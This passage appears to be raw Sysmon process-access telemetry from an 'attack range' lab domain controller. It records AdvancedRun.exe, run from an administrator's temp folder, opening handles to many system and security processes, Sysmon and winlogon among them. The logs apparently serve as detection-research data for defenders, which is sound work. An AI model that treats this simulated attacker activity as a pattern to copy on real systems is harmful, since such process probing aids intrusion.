10341000x80000000000000004077194Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077193Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004077192Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077191Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077190Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.208{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.207{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077188Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.207{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077187Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.207{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077186Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077185Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077184Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004077183Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077182Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077181Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.205{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004077180Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.203{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.203{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:16:15.202{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004077177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:16:15.202{834264DD-148F-61EB-8C08-000000002702}2216372C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
